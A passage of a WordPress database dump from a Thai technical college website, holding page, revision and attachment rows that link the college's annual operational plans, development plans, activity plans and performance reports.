href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2553.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2553<--</a>\r\n\r\n ', 'แผนปฏิบัติราชการ', '', 'inherit', 'closed', 'closed', '', '1676-revision-v1', '', '', '2018-03-08 13:47:07', '2018-03-08 06:47:07', '', 1676, 'http://www.technicrayong.ac.th/1676-revision-v1/', 0, 'revision', '', 0),
(1685, 3, '2018-03-08 13:47:50', '2018-03-08 06:47:50', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2561<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ2558.pdf\">แผนปฏิบัติราชการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2557.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/ปีงบประมาณ-2555n.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2553.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'แผนปฏิบัติราชการ', '', 'inherit', 'closed', 'closed', '', '1676-revision-v1', '', '', '2018-03-08 13:47:50', '2018-03-08 06:47:50', '', 1676, 'http://www.technicrayong.ac.th/1676-revision-v1/', 0, 'revision', '', 0),
(1687, 3, '2018-03-08 13:49:28', '2018-03-08 06:49:28', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"http://www.technicrayong.ac.th/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></h4>\r\n<h4><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></h4>\r\n<h4><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></h4>\r\n<h4><span style=\"color: #339966;\">** ปฏิทินปฏิบัติงาน</span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 13:49:28', '2018-03-08 06:49:28', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1688, 3, '2018-03-08 14:09:59', '2018-03-08 07:09:59', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/12/รูปเล่มแผนพัฒนาสถานศึกษา-2562-2566-compressed-1.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2562 - 2566<--</a> <span style=\"color: #ff0000;\">NEW!</span></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2551-2554.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2551-2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2555-2558.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2555-2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาการจัดการศึกษาปี-2557-2561-.pdf\">แผนพัฒนาสถานศึกษา ปี พ.ศ. 2557- 2561<--</a></span></h4>', 'แผนพัฒนาสถานศึกษา', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-12-13 15:35:29', '2018-12-13 08:35:29', '', 0, 'http://www.technicrayong.ac.th/?page_id=1688', 0, 'page', '', 0),
(1689, 3, '2018-03-08 13:58:53', '2018-03-08 06:58:53', '', 'แผนพัฒนาการจัดการศึกษาปี 2557- 2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2', '', '', '2018-03-08 13:58:53', '2018-03-08 06:58:53', '', 1688, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนพัฒนาการจัดการศึกษาปี-2557-2561-.pdf', 0, 'attachment', 'application/pdf', 0),
(1690, 3, '2018-03-08 13:59:00', '2018-03-08 06:59:00', '', 'แผนพัฒนาสถานศึกษา 2551-2554', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2-2551-2554', '', '', '2018-03-08 13:59:00', '2018-03-08 06:59:00', '', 1688, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2551-2554.pdf', 0, 'attachment', 'application/pdf', 0),
(1691, 3, '2018-03-08 13:59:10', '2018-03-08 06:59:10', '', 'แผนพัฒนาสถานศึกษา 2555-2558', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9e%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%b2%e0%b8%aa%e0%b8%96%e0%b8%b2%e0%b8%99%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2-2555-2558', '', '', '2018-03-08 13:59:10', '2018-03-08 06:59:10', '', 1688, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2555-2558.pdf', 0, 'attachment', 'application/pdf', 0),
(1692, 3, '2018-03-08 14:09:59', '2018-03-08 07:09:59', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2551-2554.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2551-2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาสถานศึกษา-2555-2558.pdf\">-->แผนพัฒนาสถานศึกษา ปี พ.ศ. 2555-2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนพัฒนาการจัดการศึกษาปี-2557-2561-.pdf\">แผนพัฒนาสถานศึกษา ปี พ.ศ. 2557- 2561<--</a></span></h4>', 'แผนพัฒนาสถานศึกษา', '', 'inherit', 'closed', 'closed', '', '1688-revision-v1', '', '', '2018-03-08 14:09:59', '2018-03-08 07:09:59', '', 1688, 'http://www.technicrayong.ac.th/1688-revision-v1/', 0, 'revision', '', 0),
(1695, 3, '2018-03-08 14:17:52', '2018-03-08 07:17:52', '', 'แผนปฏิบัติราชการ-สำหรับสถานศึกษา2552', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%a3%e0%b8%b2%e0%b8%8a%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%aa%e0%b8%b3%e0%b8%ab%e0%b8%a3%e0%b8%b1-3', '', '', '2018-03-08 14:17:52', '2018-03-08 07:17:52', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2552.pdf', 0, 'attachment', 'application/pdf', 0),
(1696, 3, '2018-03-08 14:18:00', '2018-03-08 07:18:00', '', '2554', '', 'inherit', 'closed', 'closed', '', '2554', '', '', '2018-03-08 14:18:00', '2018-03-08 07:18:00', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/2554.pdf', 0, 'attachment', 'application/pdf', 0),
(1697, 3, '2018-03-08 14:18:31', '2018-03-08 07:18:31', '', 'แผนปฏิบัติการปีงบประมาณ 2556', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%b5%e0%b8%87%e0%b8%9a%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%a1%e0%b8%b2-3', '', '', '2018-03-08 14:18:31', '2018-03-08 07:18:31', '', 1676, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2556-.pdf', 0, 'attachment', 'application/pdf', 0),
(1698, 3, '2018-03-08 14:20:33', '2018-03-08 07:20:33', '<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2561-1.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2561<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ2560.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2560<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2559.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ2558.pdf\">แผนปฏิบัติราชการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2557.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการปีงบประมาณ-2556-.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/ปีงบประมาณ-2555n.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/2554.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติการ-2553.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2553<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนปฏิบัติราชการ-สำหรับสถานศึกษา2552.pdf\">-->แผนปฏิบัติราชการ ปีงบประมาณ 2552<--</a></span></h4>\r\n ', 'แผนปฏิบัติราชการ', '', 'inherit', 'closed', 'closed', '', '1676-revision-v1', '', '', '2018-03-08 14:20:33', '2018-03-08 07:20:33', '', 1676, 'http://www.technicrayong.ac.th/1676-revision-v1/', 0, 'revision', '', 0),
(1699, 3, '2018-03-08 14:45:38', '2018-03-08 07:45:38', '<h3><a href=\"/%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%8a%e0%b8%a1%e0%b8%a3%e0%b8%a1%e0%b8%a7-2/\"><span style=\"color: #ff6600;\"><strong>แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2563 (ภาคเรียนที่ 2/2562, 1/2563)</strong></span></a></h3>\r\n<h3><span style=\"color: #ff6600;\"><strong><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2019/02/แผนโครงการกิจกรรมชมรมและองค์การวิชาชีพ-2-61.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2562 (ภาคเรียนที่ 2/2561, 1/2562)</a></strong></span></h3>\r\n<h3><strong><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การ-2560-2561.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2561 (ภาคเรียนที่ 2/2560, 1/2561)</a></span></strong></h3>\r\n<h3><strong><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการกิจกรรม-2559-2560.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2560 (ภาคเรียนที่ 2/2559, 1/2560)</a></span></strong></h3>\r\n<h3><strong><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการ-อชท-2558-2559.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2559 (ภาคเรียนที่ 2/2558, 1/2559)</a></span></strong></h3>', 'แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ', '', 'publish', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%8a%e0%b8%a1%e0%b8%a3%e0%b8%a1%e0%b8%a7', '', '', '2020-01-07 09:57:16', '2020-01-07 02:57:16', '', 0, 'http://www.technicrayong.ac.th/?page_id=1699', 0, 'page', '', 0),
(1700, 3, '2018-03-08 14:33:08', '2018-03-08 07:33:08', '', 'แผนโครงการกิจกรรม 2559-2560', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-2559-2560', '', '', '2018-03-08 14:33:08', '2018-03-08 07:33:08', '', 1699, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนโครงการกิจกรรม-2559-2560.pdf', 0, 'attachment', 'application/pdf', 0),
(1701, 3, '2018-03-08 14:33:20', '2018-03-08 07:33:20', '', 'แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การ 2560-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%8a%e0%b8%a1%e0%b8%a3%e0%b8%a1%e0%b8%a7', '', '', '2018-03-08 14:33:20', '2018-03-08 07:33:20', '', 1699, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การ-2560-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(1702, 3, '2018-03-08 14:33:32', '2018-03-08 07:33:32', '', 'แผนโครงการ อชท 2558-2559', '', 'inherit', 'closed', 'closed', '', '%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%ad%e0%b8%8a%e0%b8%97-2558-2559', '', '', '2018-03-08 14:33:32', '2018-03-08 07:33:32', '', 1699, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/03/แผนโครงการ-อชท-2558-2559.pdf', 0, 'attachment', 'application/pdf', 0),
(1703, 3, '2018-03-08 14:45:38', '2018-03-08 07:45:38', ' \r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการกิจกรรมชมรมวิชาชีพและองค์การ-2560-2561.pdf\">-->แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2561 (ภาคเรียนที่ 2/2560, 1/2561)<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\">--><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการกิจกรรม-2559-2560.pdf\">แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2560 (ภาคเรียนที่ 2/2559, 1/2560)<--</a></span></h4>\r\n<h4><span style=\"color: #ff6600;\"><a style=\"color: #ff6600;\" href=\"/wp-content/uploads/2018/03/แผนโครงการ-อชท-2558-2559.pdf\">-->แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ ปีงบประมาณ 2559 (ภาคเรียนที่ 2/2558, 1/2559)<--</a></span></h4>', 'แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ', '', 'inherit', 'closed', 'closed', '', '1699-revision-v1', '', '', '2018-03-08 14:45:38', '2018-03-08 07:45:38', '', 1699, 'http://www.technicrayong.ac.th/1699-revision-v1/', 0, 'revision', '', 0),
(1705, 3, '2018-03-08 14:46:31', '2018-03-08 07:46:31', '<img class=\"aligncenter size-full wp-image-1632\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-34-46.jpg\" alt=\"\" width=\"193\" height=\"246\" />\r\n\r\n<img class=\"aligncenter wp-image-1633\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-39-27-300x82.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1654\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55-240x300.jpg\" alt=\"\" width=\"240\" height=\"300\" />\r\n<h3><a href=\"/ข้อมูลงบประมาณ61\"><span style=\"color: #ff0000;\">--->ข้อมูลงบประมาณ ปีงบประมาณ 2561<---</span></a></h3>\r\n<h4><a href=\"/แผนปฏิบัติราชการ\"><span style=\"color: #ff6600;\">** แผนปฏิบัติราชการ</span></a></h4>\r\n<h4><a href=\"http://www.technicrayong.ac.th/แผนพัฒนาสถานศึกษา\"><span style=\"color: #ff6600;\">** แผนพัฒนาสถานศึกษา </span></a></h4>\r\n<h4><a href=\"http://www.technicrayong.ac.th/แผนโครงการกิจกรรมชมรมว\"><span style=\"color: #ff6600;\">** แผนโครงการกิจกรรมชมรมวิชาชีพ กิจกรรมองค์การวิชาชีพ </span></a></h4>\r\n<h4><span style=\"color: #ff00ff;\">** รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</span></h4>\r\n<h4><span style=\"color: #339966;\">** ปฏิทินปฏิบัติงาน</span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.งาน-1-1.doc\">** แบบฟอร์ม สผ.งาน</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์ม-สผ.แผนก-1-1.doc\">** แบบฟอร์ม สผ.แผนก</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มโครงการ.xls\">** แบบฟอร์มโครงการ</a></span></h4>\r\n<h4><span style=\"color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/03/แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ.xls\">** แบบฟอร์มรายงานผลการปฏิบัติงานตามแผนปฏิบัติการ</a></span></h4>\r\n<h4></h4>\r\n \r\n\r\n \r\n\r\n ', 'งานวางแผนและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1659-revision-v1', '', '', '2018-03-08 14:46:31', '2018-03-08 07:46:31', '', 1659, 'http://www.technicrayong.ac.th/1659-revision-v1/', 0, 'revision', '', 0),
(1706, 3, '2018-03-08 15:04:57', '2018-03-08 08:04:57', '<h4><strong>–><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8e%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-3/\">รายงานผลการปฎิบัติงานตามแผนปฎิบัติการ ปีงบประมาณ 2563</a></strong></h4>\r\n<h4><strong><a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8e%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95/\">–>รายงานผลการปฎิบัติงานตามแผนปฎิบัติการ ปีงบประมาณ 2562<– ชุดที่ 1 </a> <a href=\"/%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8e%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95-2/\">ชุดที่ 2_</a> </strong></h4>\r\n<h4><a href=\"/wp-content/uploads/2019/06/ชุดที่-1_compressed.pdf\"><span style=\"color: #ff00ff;\">-->รายงานผลการปฎิบัติงานตามแผนปฎิบัติการ ปีงบประมาณ 2561<--</span> ชุดที่ 1 </a> <a href=\"/wp-content/uploads/2019/06/ชุดที่-2_compressed.pdf\">ชุดที่ 2_</a></h4>\r\n<h4><a href=\"/รายงานผล2560\"><span style=\"color: #ff00ff;\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2560<--</span></a></h4>\r\n<h4> <span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2559\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2559<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2558\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2558<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/รายงานผล2557\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2557<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2556.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2556<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผลปี-2555.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2555<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2554.pdf\">-->รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2554<--</a></span></h4>\r\n<h4><span style=\"color: #ff00ff;\">--><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/03/รายงานผล-การปฏิบัติงาน-และการใช้จ่ายเงินงบประมาณ-2553.pdf\">รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ ปีงบประมาณ 2553<--</a></span></h4>\r\n ', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'publish', 'closed', 'closed', '', '%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%8f%e0%b8%b4%e0%b8%9a%e0%b8%b1%e0%b8%95%e0%b8%b4%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%95', '', '', '2021-11-25 09:48:19', '2021-11-25 02:48:19', '', 0, 'http://www.technicrayong.ac.th/?page_id=1706', 0, 'page', '', 0),
(1707, 3, '2018-03-08 15:04:57', '2018-03-08 08:04:57', '', 'รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ', '', 'inherit', 'closed', 'closed', '', '1706-revision-v1', '', '', '2018-03-08 15:04:57', '2018-03-08 08:04:57', '', 1706, 'http://www.technicrayong.ac.th/1706-revision-v1/', 0, 'revision', '', 0),
